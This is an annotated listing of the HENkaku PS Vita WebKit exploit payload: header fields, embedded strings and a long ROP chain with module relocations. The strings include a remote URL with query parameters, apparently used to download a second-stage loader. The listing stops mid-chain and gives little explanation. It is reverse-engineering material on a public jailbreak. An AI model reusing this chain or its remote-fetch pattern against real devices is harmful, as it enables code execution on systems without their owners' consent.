Henkaku exploit - Payload analysis

1. [HEADER] (0x40 bytes)
2. 0x524f507e -> ROP~
3. 0x01000100 -> Version
4. 0x00000000 -> NULL
5. 0x00000000 -> NULL
6. 0x00000730 -> No reloc
7. 0x00000000 -> NULL
8. 0x00000000 -> NULL
9. 0x00000000 -> NULL
10. 0x000003F8 -> No reloc
11. 0x00000000 -> NULL
12. 0x000C048B -> No reloc
13. 0x00000000 -> NULL
14. 0x000005E8 -> No reloc
15. 0x00000000 -> NULL
16. 0x00000038 -> No reloc
17. 0x00000000 -> NULL
18.  
19. [STACK] (from 0x40 to 0x770)
20. At 0x6F8 contains the strings:
21. "http://go.henkaku.xyz/x"
22. "st2"
23. "?a1=%x"
24. "&a2=%x&a3=%x&a4=%x&"
25. "&a5=%x&a6=%x&a7=%x&"
26. "ldr"
27.  
28.  
29. [CODE] (from 0x770 to 0xB68)
30. 0x008e27c5 -> Reloc to SceWebkit
31. 0x00000040 -> No reloc
32. 0x00000028 -> Reloc to stack
33. 0x00106fc5 -> Reloc to SceWebkit
34. 0x00014a79 -> Reloc to SceWebkit
35. 0x00000000 -> No reloc
36. 0x000c048b -> Reloc to SceWebkit
37. 0x000c048b -> Reloc to SceWebkit
38. 0x008dd9b5 -> Reloc to SceWebkit
39. 0x000000ff -> No reloc
40. 0x000003f0 -> Reloc to stack
41. 0x00000028 -> Reloc to stack
42. 0x00000000 -> No reloc
43. 0x0000675c -> Reloc to SceLibKernel
44. 0x00000000 -> No reloc
45. 0x000fcdbb -> Reloc to SceWebkit
46. 0x00000000 -> No reloc
47. 0x000c048b -> Reloc to SceWebkit
48. 0x008e27c5 -> Reloc to SceWebkit
49. 0x000001b8 -> No reloc
50. 0x000004f8 -> Reloc to stack
51. 0x00106fc5 -> Reloc to SceWebkit
52. 0x00014a79 -> Reloc to SceWebkit
53. 0x00000000 -> No reloc
54. 0x000c048b -> Reloc to SceWebkit
55. 0x000c048b -> Reloc to SceWebkit
56. 0x008e7445 -> Reloc to SceWebkit
57. 0x00000444 -> Reloc to stack
58. 0x000004f8 -> Reloc to stack
59. 0x000695b1 -> Reloc to SceWebkit
60. 0x0000676c -> Reloc to SceLibKernel
61. 0x000fcdbb -> Reloc to SceWebkit
62. 0x00000000 -> No reloc
63. 0x000c048b -> Reloc to SceWebkit
64. 0x008dd9b5 -> Reloc to SceWebkit
65. 0x000006d8 -> Reloc to stack
66. 0x000054c8 -> Reloc to SceWebkit
67. 0x10000100 -> No reloc
68. 0x00600000 -> No reloc
69. 0x0000acc9 -> Reloc to SceLibKernel
70. 0x00000000 -> No reloc
71. 0x000bfb91 -> Reloc to SceWebkit
72. 0x00000000 -> No reloc
73. 0x00000000 -> No reloc
74. 0x00000000 -> No reloc
75. 0x000c048b -> Reloc to SceWebkit
76. 0x00895285 -> Reloc to SceWebkit
77. 0x00000004 -> Reloc to stack
78. 0x00106fc5 -> Reloc to SceWebkit
79. 0x00014a79 -> Reloc to SceWebkit
80. 0x00000000 -> No reloc
81. 0x000c048b -> Reloc to SceWebkit
82. 0x008e27c5 -> Reloc to SceWebkit
83. 0x0000007c -> No reloc
84. 0x00000034 -> Reloc to stack
85. 0x00106fc5 -> Reloc to SceWebkit
86. 0x00014a79 -> Reloc to SceWebkit
87. 0x00000000 -> No reloc
88. 0x000c048b -> Reloc to SceWebkit
89. 0x000c048b -> Reloc to SceWebkit
90. 0x008e7445 -> Reloc to SceWebkit
91. 0x00000004 -> Reloc to stack
92. 0x00000034 -> Reloc to stack
93. 0x000695b1 -> Reloc to SceWebkit
94. 0x0000a791 -> Reloc to SceLibKernel
95. 0x000fcdbb -> Reloc to SceWebkit
96. 0x00000000 -> No reloc
97. 0x000c048b -> Reloc to SceWebkit
98. 0x008e7445 -> Reloc to SceWebkit
99. 0x00000068 -> Reloc to stack
100. 0x00001000 -> No reloc
101. 0x000695b1 -> Reloc to SceWebkit
102. 0x00130a15 -> Reloc to SceWebkit
103. 0x000fcdbb -> Reloc to SceWebkit
104. 0x00000000 -> No reloc
105. 0x000c048b -> Reloc to SceWebkit
106. 0x00895285 -> Reloc to SceWebkit
107. 0x0000001c -> Reloc to stack
108. 0x00106fc5 -> Reloc to SceWebkit
109. 0x00014a79 -> Reloc to SceWebkit
110. 0x00000000 -> No reloc
111. 0x000c048b -> Reloc to SceWebkit
112. 0x008e27c5 -> Reloc to SceWebkit
113. 0x000000bc -> Reloc to stack
114. 0x000006b8 -> Reloc to stack
115. 0x00006775 -> Reloc to SceLibc
116. 0x00014a79 -> Reloc to SceWebkit
117. 0x00000000 -> No reloc
118. 0x000c048b -> Reloc to SceWebkit
119. 0x000c048b -> Reloc to SceWebkit
120. 0x008dd9b5 -> Reloc to SceWebkit
121. 0x0000001c -> Reloc to stack
122. 0x00000000 -> No reloc
123. 0x008e27c5 -> Reloc to SceWebkit
124. 0x00000000 -> No reloc
125. 0x00000000 -> No reloc
126. 0x000fcdbb -> Reloc to SceWebkit
127. 0x000695b1 -> Reloc to SceWebkit
128. 0x000065bd -> Reloc to SceLibc
129. 0x0021a295 -> Reloc to SceWebkit
130. 0x000002c4 -> Reloc to stack
131. 0x00000100 -> No reloc
132. 0x000006e4 -> Reloc to stack
133. 0x001c6467 -> Reloc to SceWebkit
134. 0x00000000 -> No reloc
135. 0x000c048b -> Reloc to SceWebkit
136. 0x008e27c5 -> Reloc to SceWebkit
137. 0x000000bc -> Reloc to stack
138. 0x000002c4 -> Reloc to stack
139. 0x00006775 -> Reloc to SceLibc
140. 0x00014a79 -> Reloc to SceWebkit
141. 0x00000000 -> No reloc
142. 0x000c048b -> Reloc to SceWebkit
143. 0x000c048b -> Reloc to SceWebkit
144. 0x008dd9b5 -> Reloc to SceWebkit
145. 0x000002c4 -> Reloc to stack
146. 0x00000100 -> No reloc
147. 0x000006f0 -> Reloc to stack
148. 0x00000000 -> Reloc to SceWebkit
149. 0x000065bd -> Reloc to SceLibc
150. 0x00000000 -> No reloc
151. 0x000bfb91 -> Reloc to SceWebkit
152. 0x00000000 -> Reloc to SceLibKernel
153. 0x00000000 -> Reloc to SceLibc
154. 0x00000000 -> No reloc
155. 0x000c048b -> Reloc to SceWebkit
156. 0x008e27c5 -> Reloc to SceWebkit
157. 0x000000bc -> Reloc to stack
158. 0x000002c4 -> Reloc to stack
159. 0x00006775 -> Reloc to SceLibc
160. 0x00014a79 -> Reloc to SceWebkit
161. 0x00000000 -> No reloc
162. 0x000c048b -> Reloc to SceWebkit
163. 0x000c048b -> Reloc to SceWebkit
164. 0x008dd9b5 -> Reloc to SceWebkit
165. 0x000002c4 -> Reloc to stack
166. 0x00000100 -> No reloc
167. 0x0000070c -> Reloc to stack
168. 0x00000000 -> Reloc to Unk5
169. 0x000065bd -> Reloc to SceLibc
170. 0x00000000 -> No reloc
171. 0x000bfb91 -> Reloc to SceWebkit
172. 0x00000000 -> Reloc to SceNet
173. 0x00000000 -> Reloc to Unk7
174. 0x00000000 -> No reloc
175. 0x000c048b -> Reloc to SceWebkit
176. 0x008e27c5 -> Reloc to SceWebkit
177. 0x000000bc -> Reloc to stack
178. 0x000002c4 -> Reloc to stack
179. 0x00006775 -> Reloc to SceLibc
180. 0x00014a79 -> Reloc to SceWebkit
181. 0x00000000 -> No reloc
182. 0x000c048b -> Reloc to SceWebkit
183. 0x000c048b -> Reloc to SceWebkit
184. 0x0091b9bd -> Reloc to SceWebkit
185. 0x00010000 -> No reloc
186. 0x000092fd -> Reloc to Unk5
187. 0x000fcdbb -> Reloc to SceWebkit
188. 0x00000000 -> No reloc
189. 0x000c048b -> Reloc to SceWebkit
190. 0x008dd9b5 -> Reloc to SceWebkit
191. 0x00000728 -> Reloc to stack
192. 0x00000002 -> No reloc
193. 0x00000001 -> No reloc
194. 0x00000000 -> No reloc
195. 0x0000947b -> Reloc to Unk5
196. 0x00000000 -> No reloc
197. 0x000fcdbb -> Reloc to SceWebkit
198. 0x00000000 -> No reloc
199. 0x000c048b -> Reloc to SceWebkit
200. 0x008dbdd5 -> Reloc to SceWebkit
201. 0x000000bc -> Reloc to stack
202. 0x00000000 -> No reloc
203. 0x0000950b -> Reloc to Unk5
204. 0x0010665d -> Reloc to SceWebkit
205. 0x00000000 -> No reloc
206. 0x000c048b -> Reloc to SceWebkit
207. 0x000c048b -> Reloc to SceWebkit
208. 0x00860637 -> Reloc to SceWebkit
209. 0x00000000 -> No reloc
210. 0x000000bc -> Reloc to stack
211. 0x00000000 -> No reloc
212. 0x000095ff -> Reloc to Unk5
213. 0x000bfb91 -> Reloc to SceWebkit
214. 0x00000000 -> No reloc
215. 0x00000000 -> No reloc
216. 0x00000000 -> No reloc
217. 0x000c048b -> Reloc to SceWebkit
218. 0x00895285 -> Reloc to SceWebkit
219. 0x00000010 -> Reloc to stack
220. 0x00106fc5 -> Reloc to SceWebkit
221. 0x00014a79 -> Reloc to SceWebkit
222. 0x00000000 -> No reloc
223. 0x000c048b -> Reloc to SceWebkit
224. 0x008e27c5 -> Reloc to SceWebkit
225. 0x00000010 -> Reloc to stack
226. 0x00000000 -> No reloc
227. 0x00000000 -> No reloc
228. 0x000695b1 -> Reloc to SceWebkit
229. 0x00009935 -> Reloc to Unk5
230. 0x000fcdbb -> Reloc to SceWebkit
231. 0x00000000 -> No reloc
232. 0x000c048b -> Reloc to SceWebkit
233. 0x000c048b -> Reloc to SceWebkit
234. 0x00884b85 -> Reloc to SceWebkit
235. 0x00600000 -> No reloc
236. 0x00927215 -> Reloc to SceWebkit
237. 0x0000001c -> Reloc to stack
238. 0x000698fb -> Reloc to SceWebkit
239. 0x00000000 -> No reloc
240. 0x00927215 -> Reloc to SceWebkit
241. 0x00000010 -> Reloc to stack
242. 0x000695b1 -> Reloc to SceWebkit
243. 0x00009983 -> Reloc to Unk5
244. 0x000fcdbb -> Reloc to SceWebkit
245. 0x00000000 -> No reloc
246. 0x000c048b -> Reloc to SceWebkit
247. 0x000c048b -> Reloc to SceWebkit
248. 0x008e7445 -> Reloc to SceWebkit
249. 0x0000001c -> Reloc to stack
250. 0x000003e0 -> Reloc to stack
251. 0x000695b1 -> Reloc to SceWebkit
252. 0x00106fc5 -> Reloc to SceWebkit
253. 0x000fcdbb -> Reloc to SceWebkit
254. 0x00000000 -> No reloc
255. 0x000c048b -> Reloc to SceWebkit
256. 0x008e27c5 -> Reloc to SceWebkit
257. 0x000c048b -> Reloc to SceWebkit
258. 0x000003e4 -> Reloc to stack
259. 0x00106fc5 -> Reloc to SceWebkit
260. 0x00014a79 -> Reloc to SceWebkit
261. 0x00000000 -> No reloc
262. 0x000c048b -> Reloc to SceWebkit
263. 0x000c048b -> Reloc to SceWebkit
264. 0x008e27c5 -> Reloc to SceWebkit
265. 0x00000004 -> Reloc to stack
266. 0x0000001c -> No reloc
267. 0x000003cc -> Reloc to stack
268. 0x000695b1 -> Reloc to SceWebkit
269. 0x0000a789 -> Reloc to SceLibKernel
270. 0x000fcdbb -> Reloc to SceWebkit
271. 0x00000000 -> No reloc
272. 0x000c048b -> Reloc to SceWebkit
273. 0x000c048b -> Reloc to SceWebkit
274. 0x008e27c5 -> Reloc to SceWebkit
275. 0x00000004 -> Reloc to stack
276. 0x00000000 -> No reloc
277. 0x00000000 -> No reloc
278. 0x000695b1 -> Reloc to SceWebkit
279. 0x000016fd -> Reloc to SceLibKernel
280. 0x000fcdbb -> Reloc to SceWebkit
281. 0x00000000 -> No reloc
282. 0x000c048b -> Reloc to SceWebkit
283. 0x000c048b -> Reloc to SceWebkit